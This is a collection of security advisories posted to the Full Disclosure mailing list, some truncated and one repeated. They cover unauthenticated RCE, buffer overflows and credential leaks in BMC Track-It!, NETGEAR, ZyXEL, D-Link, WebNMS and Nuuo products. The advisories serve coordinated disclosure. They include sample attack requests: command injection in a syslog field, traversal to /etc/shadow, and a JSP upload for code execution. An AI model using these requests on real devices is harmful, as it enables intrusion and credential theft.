disclosed by SecuriTeam Secure Disclosure on July 2016.
Posting here because I've seen quite a few of these still in active use,
live and deployed in corporate networks.
The exploit is available in my repo at [3]. It's also interesting to see
how they completely ignored my advice, but I'm used to that. Here it is
in full glory for your reading pleasure.
This advisory and exploit can also be fetched at my github repo
(https://github.com/pedrib/PoC) and in the SSD blog at
https://blogs.securiteam.com/index.php/archives/2713. A big thanks to
SecuriTeam for helping out as always.
>> Multiple critical vulnerabilities in BMC Track-It! 11.4
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
=
Disclosure: 04/07/2016 / Last updated: 01/01/2017
>> Background and summary
BMC Track-It! exposes several .NET remoting services on port 9010. .NET
remoting is a remote method technology similar to Java RMI or CORBA
which allows you to invoke methods remotely and retrieve their result.
These remote methods are used when a technician uses the Track-It!
client console to communicate with the central Track-It! server. A
technician would invoke these methods for obtaining tickets, creating a
new ticket, uploading files to tickets, etc.
On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were
disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due
to the Track-It! server accepting remote method invocations without any
kind of authentication or encryption. The vulnerabilities were very
severe: one allowed an attacker to execute code on the server as NETWORK
SERVICE or SYSTEM, while the other would allow an attacker to obtain the
domain administrator and SQL server passwords if the Track-It! server
had password reset turned on.
These vulnerabilities were discovered in a trivial manner - simply by
turning Wireshark on and observing the packets one could see the remote
method invocations and objects being passed around. Duplicate and even
triplicate packets would not be rejected by the server, which would
execute whatever action was requested in the packet.
Disclosure was done by the US-CERT, which attempted to contact BMC but
received no response after 45 days. After this period they released the
vulnerability information and I released two Metasploit exploits.
BMC contacted me asking for advice on how to fix the issues, to which I
responded:
"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is
to implement authentication and authorisation. There is no other way to
fix it.
[...] Make sure the auth is done properly. You will have to negotiate
some kind of session key using the user's credential at the start and
use that session key for encryption going forward. Do not use a fixed
key, as this can be reverse engineered.
If you don't implement such mechanism, it's just a question of time
before someone else breaks your protection and finds new vulnerabilities."
On December 9th 2014, BMC released Track-It! 11.4 [2], which they
claimed had fixed the security vulnerabilities.
At first glance, this seemed to be true. Traffic in Wireshark did seem
to be encrypted. However upon further inspection, it became obvious that
while the actual method invocation and its arguments were being
encrypted using a DES key, there was still no authentication being done.
What this means in practice is that anyone can negotiate a new
encryption key with the server and use that from then on to invoke
remote methods without ever authenticating to the server, even for the
initial encryption key exchange.
The code can be inspected by decompiling TrackIt.Utility.Common.dll. The
interesting part is in:
namespace TrackIt.Utility.Common.Remoting
{
internal enum SecureTransaction
{
Uninitialized,
SendingPublicKey,
SendingSharedKey,
SendingEncryptedMessage,
SendingEncryptedResult,
UnknownIdentifier,
UnauthenticatedClient
}
}
This represents the state machine that the server uses to track client
requests. The initial state is UnauthenticatedClient for any unknown
client. A typical communication would be as follows:
1- Client generates a RSA key, which it shares with the server by
sending a Modulus and an Exponent.
2- Server creates a DES key and sends that key back to the client
3- Client and server now share an encryption key; that key is used to
pass back messages back and forth (states SendingEncryptedMessage and
SendingEncryptedResult).
As it is evident, at no point there is any authentication or credentials
being passed from the client to the server. So while all traffic is
encrypted, anyone can negotiate an encryption key with the server and
invoke an
Re: [FD] [0-day] RCE and admin credential disclosure in NETGEAR WNR2000
An update on this post: MITRE has provided me with CVE numbers. CVE-2016-10175 for #1 (information disclosure) CVE-2016-10176 for #2 (improper access control) CVE-2016-10174 for #3 (stack buffer overflow) In addition, NETGEAR has recognised the flaw and released beta firmware that is supposed to fix this vulnerability. This claim was NOT verified. The beta firmware can be downloaded from: http://kb.netgear.com/36549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability?cid=wmt_netgear_organic Regards, Pedro On 20/12/16 21:42, Pedro Ribeiro wrote: > Hi, > > tl;dr > RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or > over the WAN if remote administration is enabled. > 10.000 devices affected show up in Shodan - these are the ones with > remote admin enabled. There are likely tens of thousands of vulnerable > routers in private LANs as this device is extremely popular. > > As usual, NETGEAR did not respond to any of my emails, so I'm releasing > this advisory and exploit code as a 0-day. > See [1] for the exploit code, but bear in mind it is only "alpha" > quality. A more robust exploit will be released in the next week and > sent upstream to Metasploit. > > MITRE has not assigned any CVE numbers yet but I will keep trying to get > them. If they are not obtained then this vulnerability should be > referred with the BID / BugTraq number that will be assigned to it. > > A copy of the advisory is in > https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt > > Regards, > Pedro > >>> Stack buffer overflow vulnerability in NETGEAR WNR2000 router >>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information > Security > == > Disclosure: 20/12/2016 / Last updated: 20/12/2016 > >>> Background on the affected products: > "Wirelessly connect all of your computers and mobile devices. N300 WiFi > speed lets you simultaneously download, stream music and video, and game > online. NETGEAR genie® makes it easy to setup and monitor your network. > Parental controls keep your Internet experience safe and secure." > > >>> Summary: > The NETGEAR WNR2000 allows an administrator to perform a number of > sensitive functions in the web interface through an apparent CGI script > named apply.cgi. This script is invoked when changing Internet settings, > WLAN settings, restore to factory defaults, reboot the router, etc. > However apply.cgi is not really a script, but a function that is invoked > in the HTTP server (uhttpd) when it receives that string in the URL. > When reversing uhttpd, it was found that it also allows an > unauthenticated user to perform the same sensitive admin functions if > apply_noauth.cgi is invoked instead. > Some of the functions, such as rebooting the router, can be exploited > straight away by an unauthenticated attacker. Other functions, such as > changing Internet, WLAN settings or retrieving the administrative > password, require the attacker to send a "timestamp" variable attached > to the URL. This timestamp is generated every time the target page is > accessed and functions as a sort of anti-CSRF token. > The timestamp generating function was reverse engineered and due to > incorrect use of random number generation (details below) it is possible > to identify the token in less than 1000 attempts with no other previous > knowledge. > > By combining this knowledge with an information leakage, it is possible > to recover the administrator password. This password is then used to > enable telnet functionality in the router and obtain a root shell if the > attacker is in the LAN. > > Finally, a stack buffer overflow was also discovered, which combined > with the apply_noauth.cgi vulnerability and the timestamp identifying > attack allows an unauthenticated attacker to take full control of the > device and execute code remotely. This vulnerability allows the attacker > to execute code in the LAN and in the WAN. > > It should be noted that the WNR2000v5 does not have remote > administration enabled by default on the latest firmware, and unless the > administrator enables it, this attack is only possible in the LAN. Only > the WNR2000v5 device was tested, but versions 3 and 4 of this router > should also be vulnerable. At the time of the intial disclosure, there > are over 10.000 vulnerable routers appearing in a Shodan search. > > Exploit code has been released with this advisory, but it is of "alpha" > quality (see [1]). This exploit code will be improved and ported to > Metasploit in the next week. > > >>> Technical details:
[FD] Multiple RCE in ZyXEL / Billion / TrueOnline routers
Hi, TrueOnline is a Thai ISP that distributes customised versions of ZyXEL and Billion routers - customised with vulnerabilities that is. The routers contain several default administrative accounts and command injections that can be abused by authenticated and unauthenticated attackers. Details in the advisory below, which is a copy of https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt Metasploit modules have been released, see below. This vulnerability was disclosed through the Securiteam Secure Disclosure program: https://blogs.securiteam.com/index.php/archives/2910 http://www.beyondsecurity.com/ssd Regards, Pedro === >> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 26/12/2016 / Last updated: 12/01/2017 >> Summary: TrueOnline is a major Internet Service Provider in Thailand which distributes various rebranded ZyXEL and Billion routers to its customers. Three router models - ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion 5200W-T - contain a number of default administrative accounts, as well as authenticated and unauthenticated command injection vulnerabilities in their web interfaces, mostly in the syslog remote forwarding function. All the routers are still in widespread use in Thailand, with the Billion 5200W-T router currently being distributed to new customers. These routers are based on the TC3162U SoC (or variants of it), a system-on-a-chip made by TrendChip, which was a manufacturer of SoC that was acquired by Ralink / MediaTek in 2011. TC3162U based routers have two firmware variants. The first variant is "ras", used on hardware versions that have 4mb or less of flash storage, which is based on the real time operating system ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is vulnerable to the "misfortune cookie" attack (see [1]), and its web server is vulnerable to the "rom-0" attack (see [2]). The other variant is "tclinux", which is a full fledged Linux used in hardware versions that have more than 4 MB of flash storage. This advisory refers to this variant, which includes the Goahead web server and several ASP files with the command injection vulnerabilities. Note that tclinux might also be vulnerable to the misfortune cookie and rom-0 attacks - this was not investigated in detail by the author. For more information on tclinux see [3]. It should be noted that tclinux contains files and configuration settings in other languages (for example in Turkish). Therefore it is likely that these firmware versions are not specific to TrueOnline, and other ISP customised routers in other countries might also be vulnerable. It is also possible that other brands and router models that use the tclinux variant are also affected by the command injection vulnerabilities (the default accounts are likely to be TrueOnline specific). Please contact ped...@gmail.com if you find any other routers or firmware versions that have the same vulnerabilities. These vulnerabilities were discovered in July 2016 and reported through Securiteam's Secure Disclosure program (see https://blogs.securiteam.com/index.php/archives/2910 for their advisory). SSD contacted the vendors involved, but received no reply and posted their advisory on December 26th 2016. There is currently no fix for these issues. It is unknown whether these issues are exploitable over the WAN, although this is a possibility since some of the default accounts appear to have been deployed for ISP use. Three Metasploit modules that abuse these vulnerabilities have been released (see [4], [5] and [6]). >> Technical details: #1 Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T v1) NO-CVE Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker in the LAN. See below for other constraints. Affected versions: - ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions might be affected This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. The vulnerability is in the ViewLog.asp page, which is accessible unauthenticated. The following request will cause the router to issue 3 ping requests to 10.0.99.102: POST /cgi-bin/ViewLog.asp HTTP/1.1 remote_submit_Flag=1_syslog_Flag=1=1=0_host=%3bping+-c+3+10.0.99.102%3b%23=Save The command in injection is in the remote_host parameter. This vulnerability was found during a black box assessment of the web interface, so a root cause was not determined. #2 Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2) NO-CVE Attack Vector: Remote Constraints: Can be exploited by an authenticated attacke
[FD] [0-day] RCE and admin credential disclosure in NETGEAR WNR2000
Hi, tl;dr RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or over the WAN if remote administration is enabled. 10.000 devices affected show up in Shodan - these are the ones with remote admin enabled. There are likely tens of thousands of vulnerable routers in private LANs as this device is extremely popular. As usual, NETGEAR did not respond to any of my emails, so I'm releasing this advisory and exploit code as a 0-day. See [1] for the exploit code, but bear in mind it is only "alpha" quality. A more robust exploit will be released in the next week and sent upstream to Metasploit. MITRE has not assigned any CVE numbers yet but I will keep trying to get them. If they are not obtained then this vulnerability should be referred with the BID / BugTraq number that will be assigned to it. A copy of the advisory is in https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt Regards, Pedro >> Stack buffer overflow vulnerability in NETGEAR WNR2000 router >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 20/12/2016 / Last updated: 20/12/2016 >> Background on the affected products: "Wirelessly connect all of your computers and mobile devices. N300 WiFi speed lets you simultaneously download, stream music and video, and game online. NETGEAR genie® makes it easy to setup and monitor your network. Parental controls keep your Internet experience safe and secure." >> Summary: The NETGEAR WNR2000 allows an administrator to perform a number of sensitive functions in the web interface through an apparent CGI script named apply.cgi. This script is invoked when changing Internet settings, WLAN settings, restore to factory defaults, reboot the router, etc. However apply.cgi is not really a script, but a function that is invoked in the HTTP server (uhttpd) when it receives that string in the URL. When reversing uhttpd, it was found that it also allows an unauthenticated user to perform the same sensitive admin functions if apply_noauth.cgi is invoked instead. Some of the functions, such as rebooting the router, can be exploited straight away by an unauthenticated attacker. Other functions, such as changing Internet, WLAN settings or retrieving the administrative password, require the attacker to send a "timestamp" variable attached to the URL. This timestamp is generated every time the target page is accessed and functions as a sort of anti-CSRF token. The timestamp generating function was reverse engineered and due to incorrect use of random number generation (details below) it is possible to identify the token in less than 1000 attempts with no other previous knowledge. By combining this knowledge with an information leakage, it is possible to recover the administrator password. This password is then used to enable telnet functionality in the router and obtain a root shell if the attacker is in the LAN. Finally, a stack buffer overflow was also discovered, which combined with the apply_noauth.cgi vulnerability and the timestamp identifying attack allows an unauthenticated attacker to take full control of the device and execute code remotely. This vulnerability allows the attacker to execute code in the LAN and in the WAN. It should be noted that the WNR2000v5 does not have remote administration enabled by default on the latest firmware, and unless the administrator enables it, this attack is only possible in the LAN. Only the WNR2000v5 device was tested, but versions 3 and 4 of this router should also be vulnerable. At the time of the intial disclosure, there are over 10.000 vulnerable routers appearing in a Shodan search. Exploit code has been released with this advisory, but it is of "alpha" quality (see [1]). This exploit code will be improved and ported to Metasploit in the next week. >> Technical details: #1 Vulnerability: Information leakage NO CVE ASSIGNED Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints. Affected versions: - WNR2000v5, all firmware versions (confirmed in hardware) - WNR2000v4, all firmware versions possibly affected (confirmed only by static analysis) - WNR2000v3, all firmware versions possibly affected (confirmed only by static analysis) The device leaks its serial number when performing a request to http:///BRS_netgear_success.html: HTTP/1.0 200 OK Server: uhttpd/1.0.0 Date: Thu, 01 Jan 1970 00:11:42 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html; charset="UTF-8" Connection: close
[FD] [CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow
tl;dr A stack bof in several Dlink routers, which can be exploited by an unauthenticated attacker in the LAN. There is no patch as Dlink did not respond to CERT's requests. As usual, a Metasploit module is in the queue (see [9] below) and should hopefully be integrated soon. The interesting thing about this vulnerability is that it affects both ARM and MIPS devices, so exploitation is slightly different for each type. Link to CERT's advisory: https://www.kb.cert.org/vuls/id/677427 Link to a copy of the advisory pasted below: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt Have fun. Regards, Pedro >> Multiple vulnerabilities in Dlink DIR routers HNAP Login function (multiple routers affected) >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 07/11/2016 / Last updated: 07/11/2016 >> Background on the affected products: "Smartphones, laptops, tablets, phones, Smart TVs, game consoles and more – all being connected at the same time. That’s why we created the new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to 3.2Gbps, it delivers the necessary ultra-performance to power even the most demanding connected homes, making it the best wireless home router for gaming." >> Summary: Dlink routers expose a protocol called HNAP (Home Network Administration Protocol) on the LAN interface. This is a SOAP protocol that allows identification, configuration, and management of network devices. It seems Dlink uses an implementation of this protocol to communicate with the router's web interface over the LAN. For more information regarding HNAP, see [1] and [2]. Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in particular seems to have found a lot of them (see [3], [4], [5], [6], [7], [8]). This new vulnerability occurs in the processing of XML tags inside SOAP messages when performing the HNAP Login action. The affected function contains two subsequent stack overflows, which can be exploited by an unauthenticated attacker on the LAN. It affects a number of Dlink routers which span the ARM and MIPS architectures. A Metasploit module that exploits this vulnerability for both architectures has been released [9]. A special thanks to CERT/CC and Trent Novelly for help with disclosing this vulnerability to the vendor. Please refer to CERT's advisory for more details [10]. >> Technical details: Vulnerability: Stack buffer overflow CVE-2016-6563 Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints. Affected versions: The following MIPS devices have been confirmed to be vulnerable: DIR-823 DIR-822 DIR-818L(W) The following ARM devices have been confirmed to be vulnerable: DIR-895L DIR-890L DIR-885L DIR-880L DIR-868L -> Rev. B and C only There might be other affected devices which are not listed above. --- Vulnerability details and MIPS exploitation --- The vulnerable function, parse_xml_value (my name, not a symbol), is called from hnap_main (a symbol in the binary) in /htdocs/cgibin. This function takes 3 arguments: the first is the request object / string, the second is the XML tag name to be parsed inside the request, and the third is a pointer to where the value of that tag should be returned. The function tries to find the tag name inside the request object and then extracts the tag value, copying it first to a local variable and then to the third argument. This function is called from hnap_main when performing the HNAP Login action to obtain the values of Action, Username, LoginPassword and Catpcha from the SOAP request shown above. parse_xml_value(char* request, char* XMLtag, char* tag_value) (...) .text:00412264 xml_tag_value_start = $s2 .text:00412264 xml_tag_value_end = $s1 .text:00412264 C30 adduxml_tag_value_start, $v0, $s0 # s2 now points to $value .text:00412268 C30 la $t9, strstr .text:0041226C C30 move$a1, xml_tag_value_end # needle .text:00412270 C30 jalr$t9 ; strstr .text:00412274 C30 move$a0, xml_tag_value_start # haystack .text:00412278 C30 lw $gp, 0xC30+var_C20($sp) .text:0041227C C30 beqz$v0, loc_4122BC .text:00412280 C30 subuxml_tag_value_end, $v0, xml_tag_value_start # s1 now holds the ptr to value$ .text:00412284 C30 bltzxml_tag_value_end, loc_4122BC .text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var .text:0041228C C30 la $t9, strncpy .text:00412290 C30 move$a2, xml_tag_value_end # n .text:00412294 C30 move$a1, xml_tag_value_start #
[FD] [CVE-2016-6600/1/2/3]: Multiple vulnerabilities (RCE, file download, etc) in WebNMS Framework 5.2 / 5.2 SP1
tl;dr RCE, file download, weak encryption and user impersonation, all of which can be exploited by an unauthenticated attacker in WebNMS Framework 5.2 and 5.2 SP1. A special thanks to Beyond Security and their SSD program, which helped disclose the vulnerabilities. See their advisory at https://blogs.securiteam.com/index.php/archives/2712 My full advisory can be seen below, and a copy can be obtained at the github repo https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt Metasploit modules have also been released. Regards, Pedro >> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1 >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security == Disclosure: 04/07/2016 / Last updated: 08/08/2016 >> Background on the affected product: "WebNMS is an industry-leading framework for building network management applications. With over 25,000 deployments worldwide and in every Tier 1 Carrier, network equipment providers and service providers can customize, extend and rebrand WebNMS as a comprehensive Element Management System (EMS) or Network Management System (NMS). NOC Operators, Architects and Developers can customize the functional modules to fit their domain and network. Functional modules include Fault Correlation, Performance KPIs, Device Configuration, Service Provisioning and Security. WebNMS supports numerous Operating Systems, Application Servers, and databases." >> Summary: WebNMS contains three critical vulnerabilities that can be exploited by an unauthenticated attacker: one directory traversal that can be used to achieve remote code execution, another directory traversal that can be abused to download any text file in the system and the possibility to impersonate any user in the system. In addition, WebNMS also stores the user passwords in a file with a weak obfuscation algorithm that can be easily reversed. A special thanks to the SecuriTeam Secure Disclosure programme (SSD), which performed the disclosure in a responsible manner to the affected vendor. This advisory can be seen in their blog at https://blogs.securiteam.com/index.php/archives/2712 >> Technical details: #1 Vulnerability: Directory traversal in file upload functionality (leading to remote code execution) CVE-2016-6600 Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints. Affected versions: unknown, at least 5.2 and 5.2 SP1 The FileUploadServlet has a directory traversal vulnerability, that allows an unauthenticated attacker to upload a JSP file that executes on the server. To exploit this vulnerability, simply POST as per the proof of concept below. The directory traversal is in the "fileName" parameter. POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1 There are two things to keep in mind for the upload to be successful: - Only text files can be uploaded, binary files will be mangled. - In order to achieve code execution without authentication, the files need to be dropped in ../jsp/ but they can only have the following names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of any length. #2 Vulnerability: Directory traversal in file download functionality CVE-2016-6601 Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. Only text files can be downloaded properly, any binary file will get mangled by the servlet and downloaded incorrectly. Affected versions: unknown, at least 5.2 and 5.2 SP1 The FetchFile servlet has a directory traversal vulnerability that can be abused by an unauthenticated attacker to download arbitrary files from the WebNMS host. The vulnerable parameter is "fileName" and a proof of concept is shown below. GET /servlets/FetchFile?fileName=../../../etc/shadow #3 Vulnerability: Weak obfuscation algorithm used to store passwords CVE-2016-6602 Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. Affected versions: unknown, at least 5.2 and 5.2 SP1 The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory) contains entries with all the usernames and passwords in the server: The algorithm used to obfuscate is convoluted but easy to reverse engineer. The passwords above are "guest" for the "guest" user and "admin" for the "root" user. A Metasploit module implementing the deobfuscation algorithm has been released. This vulnerability can be combined with #2 and allow an unauthenticated attacker to obtain credentials for all user accounts: GET /servlets/FetchFile?fileName=conf/securitydbData.xml #4 Vulnerability: User account impersonation / hijacking CVE-2016-6603 Attack Vector: Remote Constraints: Can be exploited by an unauthenticated attacker. Affected versions: unknown, at least 5.2 and 5.2 SP1
Re: [FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance
On 04/08/16 17:46, Pedro Ribeiro wrote: > tl;dr > > Lots of RCE, hardcoded credentials, stack buffer overflow and > information disclosure in the Nuuo NVRmini and other network video > recorders of the same vendor. > These vulnerabilities also affect the NETGEAR Surveillance app (which > can be installed on the NETGEAR ReadyNAS). > > See the full advisory including PoC and exploits below, or at my github > (https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt). > > Metasploit modules have been submitted for vulns #1, #2 and #3: > https://github.com/rapid7/metasploit-framework/pull/7180 > https://github.com/rapid7/metasploit-framework/pull/7181 > https://github.com/rapid7/metasploit-framework/pull/7182 > > Thanks to CERT/CC for helping me disclose this vulnerabilities - see > https://www.kb.cert.org/vuls/id/856152 for their advisory. > > Regards, > Pedro > > == > >>> Fix: > NETGEAR and Nuuo did not respond to CERT/CC coordination efforts (see > Timeline below), so no fix is available. > Do not expose any of these devices to the Internet or any networks with > unstrusted hosts. > > Timeline: > 28.02.2016: Disclosure to CERT/CC. > 27.04.2016: Requested status update from CERT - they did not receive any > response from vendors. > 06.06.2016: Requested status update from CERT - still no response from > vendors. > Contacted Nuuo and NETGEAR directly. NETGEAR responded with > their "Responsible Disclosure Guidelines", to which I did not agree and > requested them to contact CERT if they want to know the details about > the vulnerabilities found. No response from Nuuo. > 13.06.2016: CERT sent an update saying that NETGEAR has received the > details of the vulnerabilities, and they are attempting to contact Nuuo > via alternative channels. > 07.07.2016: CERT sent an update saying that they have not received any > follow up from both Nuuo and NETGEAR, and that they are getting ready > for disclosure. > 17.07.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 01.08.2016: Sent an email to NETGEAR and Nuuo warning them that > disclosure is imminent if CERT doesn't receive a response or status > update. No response received. > 04.08.2016: Coordinated disclosure with CERT. > > >>> References: > [1] https://www.kb.cert.org/vuls/id/856152 > > > > Agile Information Security Limited > http://www.agileinfosec.co.uk/ >>> Enabling secure digital business >> Forgot to mention - these are actually "0 days" since the vendors didn't bother to respond or issue fixes - see timeline above. Regards, Pedro ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Multiple remote vulnerabilities (RCE, bof) in Nuuo NVR and NETGEAR Surveillance
tl;dr Lots of RCE, hardcoded credentials, stack buffer overflow and information disclosure in the Nuuo NVRmini and other network video recorders of the same vendor. These vulnerabilities also affect the NETGEAR Surveillance app (which can be installed on the NETGEAR ReadyNAS). See the full advisory including PoC and exploits below, or at my github (https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt). Metasploit modules have been submitted for vulns #1, #2 and #3: https://github.com/rapid7/metasploit-framework/pull/7180 https://github.com/rapid7/metasploit-framework/pull/7181 https://github.com/rapid7/metasploit-framework/pull/7182 Thanks to CERT/CC for helping me disclose this vulnerabilities - see https://www.kb.cert.org/vuls/id/856152 for their advisory. Regards, Pedro == >> Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application >> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) == Disclosure: 04/08/2016 / Last updated: 04/08/2016 >> Background on the affected products: "NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always." "NVRsolo is NUUO’s answer to hassle free, lightweight NVR system. It is small in size yet able to handle heavy duty tasks. With local HDMI/VGA display and keyboard/mouse input built right into the unit, configuring NVRsolo is easy and simple. Built on solid Linux foundation, we sacrificed nothing except unnecessary bulk to make NVRsolo the award winning standalone NVR solution you have been looking for. NVRsolo's flexibility doesn't end there. For those needing more storage options, we offer 8 bay versions to meet your needs." "NUUO Crystal™ is the product that represents the next stage in VMS evolution. Rock solid, easily manageable, with powerful recording and viewing options available. Featuring revolutionary modular system structure that is made to handle large project size, NUUO Crystal™ is the ideal choice for your enterprise. Featuring technology that focuses on delivering stable video recording performance, recording failover, and 3rd party integration choice, you will be impressed with the stability and flexible options with NUUO Crystal™." "(ReadyNAS Surveillance) NETGEAR combines leading storage and switching solutions together with sophisticated network video recording software to provide an affordable and easy to install and manage surveillance solution. Small businesses and corporate branch offices require a secure way to protect physical assets, but may lack deep security expertise or a big budget. A user-friendly NVR system should combine fast and flexible configuration with easy operation. With a few simple steps for installation, the web-based management leads users to configure, monitor and playback video everywhere. UPnP search, auto camera detection and GUI schedule save setting-up time, while the easy drag and drop camera, auto scan, preset point patrolling, and multiple views offer users a prime monitoring experience." >> Summary: NUUO is a vendor of Network Video Recording (NVR) systems for surveillance cameras. These NVR are Linux embedded video recording systems that can manage a number of cameras and are used worldwide by public institutions, banks, SME's, etc. They also provide a software package to NETGEAR that adds network video recording and monitoring capabilities to the well known NETGEAR ReadyNAS Network Attached Storage systems. The web interface contains a number of critical vulnerabilities that can be abused by unauthenticated attackers. These consist of monitoring backdoors left in the PHP files that are supposed to be used by NUUO's engineers, hardcoded credentials, poorly sanitised input and a buffer overflow which can be abused to achieve code execution on NUUO's devices as root, and on NETGEAR as the admin user. Although only the NVRmini 2, NVRsolo, Crystal and ReadyNAS Surveillance devices are known to be affected, it is likely that the same code is used in other NUUO devices or even other third party devices (the firmware is littered with references to other devices like NUUO Titan). However this has not been confirmed as it was not possible to access all NUUO and third party devices that might be using the same code. A special thanks to CERT/CC (https://www.cert.org/) for assistance wi
[FD] [CERT 777024 / CVE-2016-1524/5]: RCE and file download in Netgear NMS300
Hi,
CERT/CC has helped me disclose two vulnerabilities in NETGEAR's
Pro"safe" Network Management System 300 [1]. Two classical bugs: one
remote code execution via arbitrary file upload and an authenticated
arbitrary file download.
The full advisory can be seen in my repo at [2] and it is also pasted
below. I've also released two Metasploit modules to exploit these
vulnerabilities [3][4].
There is currently no fix for these - do not expose NMS300 to the
Internet! I've decided to release the exploits anyway as CERT's advisory
details how the vulnerability can be exploited.
Regards,
Pedro
[1] https://www.kb.cert.org/vuls/id/777024
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt
[3] https://github.com/rapid7/metasploit-framework/pull/6530
[4] https://github.com/rapid7/metasploit-framework/pull/6531
>> Remote code execution / arbitrary file download in NETGEAR ProSafe
Network Management System NMS300
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security (http://www.agileinfosec.co.uk/)
==
Disclosure: 04/02/2016 / Last updated: 04/02/2016
>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.
The NETGEAR Management System NMS300 delivers insight into network
elements, including third-party devices. An intuitive, web-based user
interface makes it easier to monitor and administer an entire network."
>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows
systems. It has serious two vulnerabilities that can be exploited by a
remote attacker. The first one is an arbitrary file upload vulnerability
that allows an unauthenticated attacker to execute Java code as the
SYSTEM user.
The second vulnerability is an arbitrary file download that allows an
authenticated user to download any file from the host that is running
NMS300.
A special thanks to Joel Land of CERT/CC for helping disclose this
vulnerability under ID 777024 [1]. Two new Metasploit modules that
exploit these vulnerabilities have been released.
>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload
(unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload
The JSP file can be uploaded as shown below, it will be named
null[name].[extension] and can be reached on
http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final
file will be named "nulltesting.jsp". [name] and [extension] can be seen
in the sample request below. The code will execute as the SYSTEM user.
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data;
boundary=--ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"
[name]
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata";
filename="whatever.[extension]"
Content-Type: application/octet-stream
<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
http://www.w3.org/TR/html4/loose.dtd;>
Hello World Example
A Hello World Example of JSP.
ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the
path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../===1337=Netgear=4=FS526Tv2=bla
b) Obtain the file identifier (imageId) for the image that was created
